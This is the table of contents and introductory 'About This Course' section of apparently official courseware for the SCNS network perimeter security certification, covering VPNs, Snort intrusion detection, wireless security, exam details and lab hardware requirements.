Configuring the IPSec Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
Task 6D-2 Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy . . . . 330
AH and ESP IPSec Session Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Task 6D-3 Configuring and Analyzing an IPSec Session Using AH and ESP. 331
Configuring All the Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
Task 6D-4 Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy . 333
Configuring the AH-and-ESP IPSec Response Policy. . . . . . . . . . . . . . . 335
Task 6D-5 Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy . 335
Implementing the Full IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Task 6D-6 Implementing and Analyzing an AH(sha) and ESP(sha+3des)
IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Topic 6E VPN Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .337
VPN Business Drivers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
VPN Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
CONTENTS
x Tactical Perimeter Defense
VPN Elements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
Tunneling and Security Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
Task 6E-1 Defining Tunneling Protocols . . . . . . . . . . . . . . . . . . . . . . . 341
Topic 6F Tunneling Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .341
Point-to-Point Tunneling Protocol (PPTP) . . . . . . . . . . . . . . . . . . . . . . 342
Layer 2 Tunneling Protocol (L2TP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
IPSec Tunnel and Transport Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
IPSec and Network Address Translation (NAT) . . . . . . . . . . . . . . . . . . . 346
Task 6F-1 Assigning Tunneling Protocols . . . . . . . . . . . . . . . . . . . . . . 347
Topic 6G VPN Design and Architecture. . . . . . . . . . . . . . . . . . . . . . . . . .348
VPN Implementation Challenges. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Task 6G-1 Examining VPN-related RFCs. . . . . . . . . . . . . . . . . . . . . . . . 349
Topic 6H VPN Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .350
VPNs and Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351
VPN Authentication. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
Task 6H-1 Viewing Firewall-related RFCs . . . . . . . . . . . . . . . . . . . . . . . 353
Topic 6I Configuring a VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .354
Task 6I-1 Configuring the VPN Server . . . . . . . . . . . . . . . . . . . . . . . . 354
VPN Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Task 6I-2 Configuring VPN Clients. . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Establishing the VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
Task 6I-3 Establish the VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
Returning the Classroom Setup to its Original State . . . . . . . . . . . . . . 364
Task 6I-4 Restoring the Classroom Setup . . . . . . . . . . . . . . . . . . . . . . 364
Lesson Review 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
LESSON 7: DESIGNING AN INTRUSION DETECTION SYSTEM
Topic 7A The Goals of an Intrusion Detection System . . . . . . . . . . . . .371
What is Intrusion Detection? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Some Intrusion Detection Definitions . . . . . . . . . . . . . . . . . . . . . . . . . 373
The IDS Matrix. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
IDS Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
Realistic Goals of IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376
Task 7A-1 Describing Alarms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
Topic 7B Technologies and Techniques of Intrusion Detection. . . . . .377
The Intrusion Detection Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Behavioral Use. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379
Information Collection and Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . 382
Task 7B-1 Discussing IDS Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . 383
CONTENTS
Contents xi
Topic 7C Host-based Intrusion Detection . . . . . . . . . . . . . . . . . . . . . . .384
Host-based IDS Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 384
Centralized Host-based IDS Design. . . . . . . . . . . . . . . . . . . . . . . . . . . . 384
Distributed Host-based IDS Design. . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Task 7C-1 Describing Centralized Host-based Intrusion Detection . . . . . . 387
Topic 7D Network-based Intrusion Detection . . . . . . . . . . . . . . . . . . . .387
Network-based IDS Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388
Traditional Network-based IDS Design . . . . . . . . . . . . . . . . . . . . . . . . . 388
Distributed Network-based IDS Design. . . . . . . . . . . . . . . . . . . . . . . . . 389
Task 7D-1 Discussing Sensor Placement . . . . . . . . . . . . . . . . . . . . . . . 390
Topic 7E The Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .391
When to Analyze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Interval Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Real-time Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
How to Analyze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
Signature Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
An Example Signature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
Statistical Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Task 7E-1 Discussing Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Topic 7F How to Use an IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .394
Detection of Outside Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Detection of Inside Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Anticipation of Attack Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Surveillance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Task 7F-1 Discussing Intrusion Detection Uses . . . . . . . . . . . . . . . . . . 397
Topic 7G What an IDS Cannot Do . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .398
Provide the Magic Solution. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Manage Hardware Failures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Investigate an Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
100 Percent Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
Task 7G-1 Discussing Incident Investigation . . . . . . . . . . . . . . . . . . . . 399
Lesson Review 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
LESSON 8: CONFIGURING AN IDS
Topic 8A Snort Foundations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .404
Snort Deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
How Snort Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Snort Fundamentals. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Topic 8B Snort Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .406
Task 8B-1 Installing Snort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Common Snort Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
CONTENTS
xii Tactical Perimeter Defense
Task 8B-2 Initial Snort Configuration . . . . . . . . . . . . . . . . . . . . . . . . 408
Using Snort as a Packet Sniffer. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Task 8B-3 Capturing Packets with Snort . . . . . . . . . . . . . . . . . . . . . . . 411
Task 8B-4 Capturing Packet Data with Snort . . . . . . . . . . . . . . . . . . . . 413
Task 8B-5 Logging with Snort. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Topic 8C Snort as an IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .415
Its All in the Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Snort Rule IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
Task 8C-1 Creating a Simple Ruleset . . . . . . . . . . . . . . . . . . . . . . . . . 421
Task 8C-2 Testing the Ruleset. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
More Rule Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
Pre-configured Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425
Task 8C-3 Examining Pre-configured Rules . . . . . . . . . . . . . . . . . . . . . 426
Examine Denial of Service Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426
Task 8C-4 Examining DDoS Rules. . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Examine Backdoor Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Task 8C-5 Examining Backdoor Rules . . . . . . . . . . . . . . . . . . . . . . . . . 427
Examine Web Attack Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 428
Task 8C-6 Examining Web Attack Rules . . . . . . . . . . . . . . . . . . . . . . . 428
Examine Web IIS Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429
Task 8C-7 Examining IIS Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429
Topic 8D Configuring Snort to Use a Database . . . . . . . . . . . . . . . . . . .430
Snort Output Plug-ins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Configure Snort to Use a Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Task 8D-1 Editing Snort.Conf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Installing MySQL for Snort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Task 8D-2 Installing MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Task 8D-3 Creating the Snort Database. . . . . . . . . . . . . . . . . . . . . . . . 432
MySQL User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Task 8D-4 Creating MySQL User Accounts . . . . . . . . . . . . . . . . . . . . . . 433
Snort to Database Connectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Task 8D-5 Testing the New Configuration . . . . . . . . . . . . . . . . . . . . . . 434
Snort as a Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
Task 8D-6 Configuring Snort as a Service . . . . . . . . . . . . . . . . . . . . . . 434
Topic 8E Running an IDS on Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . .435
LAMP On SuSe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Task 8E-1 Installing LAMP Components . . . . . . . . . . . . . . . . . . . . . . . 436
Apache and PHP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436
Task 8E-2 Apache and PHP Test . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
Enable Snort on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Task 8E-3 Configure Snort on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . 438
Configuring MySQL on Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Task 8E-4 Configuring MySQL for Snort. . . . . . . . . . . . . . . . . . . . . . . . 439
Connecting Snort to a Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
CONTENTS
Contents xiii
Task 8E-5 Testing Snort Connectivity to the Database. . . . . . . . . . . . . . 440
Installing ADOdb and BASE. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
Task 8E-6 Downloading ADOdb and BASE . . . . . . . . . . . . . . . . . . . . . . 441
Task 8E-7 Installing ADOdb and BASE . . . . . . . . . . . . . . . . . . . . . . . . 441
Configuring BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442
Task 8E-8 Configuring BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442
Task 8E-9 Configuring the Firewall to Allow HTTP . . . . . . . . . . . . . . . . 443
Generating Snort Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Task 8E-10 Generating Portscan Snort Events . . . . . . . . . . . . . . . . . . . . 443
Task 8E-11 Generating Web Snort Events . . . . . . . . . . . . . . . . . . . . . . . 444
Lesson Review 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
LESSON 9: SECURING WIRELESS NETWORKS
Topic 9A Wireless Networking Fundamentals . . . . . . . . . . . . . . . . . . . .448
Wireless Equipment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448
Wireless Media. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
Task 9A-1 Examining Satellite Orbits . . . . . . . . . . . . . . . . . . . . . . . . . 456
Radio Wireless Media. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457
Bluetooth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
Short Message Service. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
IEEE 802.11. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Wireless Application Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 462
Task 9A-2 Choosing a Wireless Media . . . . . . . . . . . . . . . . . . . . . . . . . 464
Topic 9B Wireless LAN (WLAN) Fundamentals . . . . . . . . . . . . . . . . . . .465
Association . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
WLAN Topologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
Lesson Configuration. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468
Prepare for the Ad-hoc Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468
Task 9B-1 Installing the Linksys WPC54G WNIC . . . . . . . . . . . . . . . . . . 469
Configure the Second WNIC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Task 9B-2 Installing the Netgear WPN511. . . . . . . . . . . . . . . . . . . . . . 471
Enable the Ad-Hoc Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Task 9B-3 Enabling the Ad-Hoc Network. . . . . . . . . . . . . . . . . . . . . . . 474
802.11 Framing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
Access Point Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
Task 9B-4 Installing the Linksys WAP54G Access Point . . . . . . . . . . . . . 482
Configure the Infrastructure Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . 485
Task 9B-5 Configuring the Linksys Client . . . . . . . . . . . . . . . . . . . . . . 485
Adding Infrastructure Network Clients . . . . . . . . . . . . . . . . . . . . . . . . . 487
Task 9B-6 Configuring the Netgear Client . . . . . . . . . . . . . . . . . . . . . . 487
WLAN Threats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488
CONTENTS
xiv Tactical Perimeter Defense
Topic 9C Wireless Security Solutions . . . . . . . . . . . . . . . . . . . . . . . . . . .490
Wireless Transport Layer Security (WTLS) . . . . . . . . . . . . . . . . . . . . . . . 491
Fundamental Access Point Security . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
Wired Equivalent Privacy (WEP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
Configure WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
Task 9C-1 Installing the Netgear WPN824 Access Point . . . . . . . . . . . . . 502
Establishing the WEP Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 504
Task 9C-2 Configuring WEP on the Network Client . . . . . . . . . . . . . . . . 505
Temporal Key Integrity Protocol (TKIP) . . . . . . . . . . . . . . . . . . . . . . . . 506
Extensible Authentication Protocol (EAP) . . . . . . . . . . . . . . . . . . . . . . 506
Wi-Fi Protected Access (WPA). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 507
Configure WPA2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Task 9C-3 Configure WPA2 on the Access Point . . . . . . . . . . . . . . . . . . 509
Supplicants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Task 9C-4 Configuring WPA2 on the Network Client . . . . . . . . . . . . . . . 510
802.1x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
Topic 9D Wireless Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .512
Wireshark. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513
NetStumbler. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513
Task 9D-1 Installing NetStumbler . . . . . . . . . . . . . . . . . . . . . . . . . . . 514
Identify Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 514
Task 9D-2 Identifying Wireless Networks . . . . . . . . . . . . . . . . . . . . . . 515
OmniPeek Personal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 515
Task 9D-3 Installing OmniPeeK Personal . . . . . . . . . . . . . . . . . . . . . . . 516
WildPackets Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 517
OmniPeek Personal Captures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 517
Task 9D-4 Viewing OmniPeek Personal Captures . . . . . . . . . . . . . . . . . . 517
Live Captures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521
Task 9D-5 Viewing Live OmniPeek Personal Captures. . . . . . . . . . . . . . . 521
Non-802.11 Packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 522
Task 9D-6 Analyze Upper Layer Traffic . . . . . . . . . . . . . . . . . . . . . . . . 522
Decode WEP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523
Task 9D-7 Decrypting WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523
Aircrack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526
WEPCrack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
AirSnort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Ekahau. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Kismet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Topic 9E Wireless Trusted Networks. . . . . . . . . . . . . . . . . . . . . . . . . . . .528
802.1x and EAP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 528
EAP Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
Lightweight EAP (LEAP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
EAP with Transport Layer Security (EAP-TLS) . . . . . . . . . . . . . . . . . . . . 530
EAP with Tunneled Transport Layer Security (EAP-TTLS) . . . . . . . . . . . 531
Protected EAP (PEAP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
CONTENTS
Contents xv
EAP Type Comparison . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
Wireless Trusted Network Summary. . . . . . . . . . . . . . . . . . . . . . . . . . . . 533
Task 9E-1 Choosing a Wireless Trusted Network . . . . . . . . . . . . . . . . . . 533
Lesson Review 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 534
Glossary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .537
Index. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543
CONTENTS
xvi Tactical Perimeter Defense
ABOUT THIS COURSE
This course is the official courseware for the Security Certied Program SC0-451
certication exam. The Tactical Perimeter Defense course is designed to provide
network administrators and certication candidates with hands-on tasks on the
most fundamental perimeter security technologies. The network perimeter is often
the rst line of defense in an organizations network, and this course covers the
issues every administrator must be familiar with.
What is the Security Certied Program (SCP)?
Security Certied Program is both our company name and our program name.
Security Certied Program, LLC a Chicago-based security training organization,
has created the Security Certied Program (SCP) to help develop and validate
your skills as a computer and network security professional. The SCP courses and
certications are designed not just around knowledge-based theory, like so many
others, rather around the actual technical skills required by practitioners.
The SCP structure is unique as it measures competence in core security skills as
well as skills needed for specic security technologies, such as Packet Structure,
Signature Analysis, Operating System Hardening, Router Security, Firewalls, Vir-
tual Private Networks (VPNs), Intrusion Detection, Risk Analysis, Wireless
Security, Digital Signatures and Certicates, Cryptography, Biometrics and Net-
work Forensics.
The SCP certications include three vendor-neutral security certications. The
rst certication is the Security Certied Network Specialist (SCNS), the next
certication is Security Certied Network Professional (SCNP), and the third is
Security Certied Network Architect (SCNA).
ABOUT THIS
COURSE
About This Course xvii
The Security Certied Program Certication Path
What is SCNS?
The SCNS (Security Certied Network Specialist) is the SCPs core certication.
The primary focus is on the defense of the perimeter. This certication covers the
core security technologies used in defending todays business environments,
including the following: Network Defense Fundamentals, Advanced TCP/IP,
Router Security and Access Control Lists, Designing & Conguring Firewalls,
Conguring Virtual Private Networks, Designing & Conguring Intrusion Detec-
tion Systems, and Securing Wireless Networks.
What kind of experience do I need before I go for my SCNS?
Before you begin the SCNS certication track, it is recommended that, at a mini-
mum, you attain CompTIAs Security+ certication or have equivalent training
with hands-on experience. The SCNS training and certication build on concepts
and skills covered in the Security+ certication.
xviii Tactical Perimeter Defense
How do I become SCNS certied?
The SCNS certication is comprised of one exam, titled: Tactical Perimeter
Defense (TPD). To become SCNS certied, candidates must complete this exam
with a passing score. The TPD exam uses exam number: SC0-451.
It is strongly recommended that candidates study this official courseware exten-
sively, and implement the hands-on tasks repeatedly, before taking the exams.
What are exams like?
The exams are multiple-answer, often scenario-based tests. The TPD exam has 60
questions and the candidate has 90 minutes to complete the exam.
At the time of this publication, the exam breakdown was as follows:
Examination Domain Percentage
1.0 Network Defense Fundamentals 5%
2.0 Hardening Routers and Access Control Lists 10%
3.0 Implementing IPSec and Virtual Private Networks 10%
4.0 Advanced TCP/IP 15%
5.0 Security Wireless Networks 15%
6.0 Designing and Conguring Intrusion Detection Systems 20%
7.0 Designing and Conguring Firewall Systems 25%
Note that SCP exams are updated regularly to reect changes in the network
security industry. It is strongly recommended that potential candidates review the
exam objectives at www.securitycertied.net/certications.htm
How do I take the exams?
The SCP exams are available at any Prometric or VUE Testing center in over
7,400 locations around the world.
There are several ways to register for SCP exams. To register for SCP exams
over the Internet, visit Prometric at www.prometric.com/SCP or VUE at www.
vue.com/scp/ and create and account with the vendor of your choice (if you dont
already have one).
For International Exam Registration, please check with your preferred vendors
Web site for more information.
During the exam:
Read questions carefully. Dont jump to any conclusions!
Skip questions that you are unsure of, and come back to them at the end.
If you have time remaining, you will be given the opportunity to review
your answers. Be sure to do so, and make sure you didnt make any obvious
mistakes.
If you come back to a question and are not sure about an answer, remember
that your rst hunch is more often correct than your second-choice answer
(after overanalyzing the question)!
Be sure to answer all questions; unanswered questions count against your
score, so if you dont have an answer, try to eliminate any options that you
know are wrong and make a best guess from whatever remains.
About This Course xix
On your exam day, try to arrive 15 minutes early so you do not feel rushed or
stressed by being late. This will also give you a few minutes to review any notes
before beginning your exam. However, as the SCP exams are closed-book, notes
or calculators may not be brought into the testing station and will have to be left
with the facilitys faculty.
Will my certicate expire?
Yes. As technologies in the security eld are constantly changing, your SCNS
certicate will be valid for two years starting on the date you pass the Tactical
Perimeter Defense exam. Candidates who have received their SCNS credential
will need to retake the TPD exam before their SCNS certication expires. Candi-
dates who are recertifying will be able to do so at a discounted exam rate. For
more information on the current SCNS re-certication exam rate please email
Exams@SecurityCertied.Net.
What if I want to go further?
After you have become SCNS-certied you will have the option of furthering
your skills by moving on to the next level of SCP certication, the Security Certi-
ed Network Professional (SCNP) certicate.
The Security Certied Network Professional (SCNP) certication is focused on
infrastructure technologies. SCNP builds upon the security concepts and technolo-
gies covered in Tactical Perimeter Defense (TPD). The SCNP course, Strategic
Infrastructure Security (SIS) covers several critical areas Cryptography, Operat-
ing System Security (Windows 2003 and SuSe Linux), Attack Techniques,
Internet and WWW Security, Risk Analysis, Security Policy Creation, and Analy-
sis of Intrusion Signatures.
To become a Security Certied Network Professional (SCNP), candidates must
successfully pass one exam and hold a current Security Certied Network Spe-
cialist (SCNS) certication.
Security Certied Programs third certication is Security Certied Network
Architect (SCNA). SCNA deals with more advanced security skills and concepts.
Many enterprises are trying to integrate Digital Signatures, Digital Certicates,
and Biometric and Smart Card Authentication systems into their infrastructures.
These technologies are vital for businesses as they look to integrate their partners
and suppliers into their business structures and provide real-time information and
services to their customers.
SCNA is about the fundamentals of building a trusted network, strong authentica-
tion techniques, encryption, biometrics, smart cards, and network forensics.
SCNA includes two courses, Advanced Security Implementation (ASI) and Enter-
prise Security Solutions (ESS). Each course is a 40-hour program, and the
content and hands-on labs are structures to develop the skills required by todays
top security experts.
To become a Security Certied Network Architect (SCNA), candidates must pass
two exams. The rst is Enterprise Security Implementation (ESI), which covers
the concepts and lab work covered in both the ASI and ESS courses, and the sec-
ond is The Solutions Exam (TSE); which will cover all facets of technologies
covered in all of the SCP courses.
How do I prepare for the exam?
The TPD exam will require that you be familiar with many technologies and
utilities that are covered in this book. Further, the test was authored with the
xx Tactical Perimeter Defense
intention that people who have not become familiar with the technologies and
utilities covered will not nd it as easy to pass the exam as those who have used
the program and technologies in question.
What does all this mean? It means that you really should use the utilities and
programs that are covered here, rather than just read about them. You should
become very familiar with all of the tasks in this book. If possible, create a home
lab with at least two machines, and practicerepeatedlythe hands-on tasks in
this book. Even using what you learned to help secure your own home network
from hosts on the Internet will help you prepare for the exam
Studying for the exam:
1. Read the book from start to nish completing all the tasks even if you are
familiar with the technology in question. You never know when some new
facet of a technology or program may be brought up and many of the les-
sons build upon the previous ones and it is easy to miss something if you
skip around.
2. Be sure to complete all hands-on tasks. Again, the SCP exams are based on
knowledge and hands-on experience! Once you have completed a task, do it
again until you are very comfortable with that task.
3. Be sure to answer Topic Review questions within each lesson. Make note of
the questions you answered incorrectly and study the appropriate sections
again.
4. Before taking the SCP exams, it is recommended that you take the practice
exams available through MeasureUp. More information on officially recom-
mended practice exams is available at: www.securitycertied.net/practice_
tests.htm.
But perhaps the best way to make sure that you reach your goal is to register for
the exam and stick to the date you set forth. Nothing keeps you on your toes and
working toward a goal like a deadline! Honestly measure your skills, make your
study schedule, and set the date that you will be ready to take the exam and reg-
ister for it.
Practice exams
The only provider of practice exams authorized and recommended by the creators
of the SCP is MeasureUp. For more information visit www.securitycertied.net/
practice_tests.htm for more information.
Contact Information
The Security Certied Program
US: 800-869-0025
International: 630-208-5030
Email: Info@SecurityCertied.Net
Website: www.SecurityCertied.Net
Course Prerequisites
To ensure your success, we recommend that you have CompTIAs Security+ cer-
tication, or have equivalent experience. This course assumes that the reader has
fundamental working knowledge of networking concepts, and foundational secu-
rity knowledge.
About This Course xxi
Course Objectives
When youre done working your way through this course, youll be able to:
Describe the core issues of building a perimeter network defense system.
Investigate the advanced concepts of the TCP/IP protocol suite.
Secure routers through hardening techniques and congure Access Control
Lists.
Design and congure multiple rewall technologies.
Examine and implement IPSec and Virtual Private Networks.
Design and congure an Intrusion Detection System.
Secure wireless networks through the use of encryption systems.
COURSE SETUP INFORMATION
Hardware and Software Requirements
To run this course, you will need:
Student machines, one per student, recommended minimum specications:
Pentium 4, 2.0 GHz processor.
512 MB of RAM.
50 GB hard drive.
DVD-ROM drive.
NIC, capable of promiscuous mode support.
Integrated video card, capable of 32-bit video.
Instructor machine, same conguration as student machines.
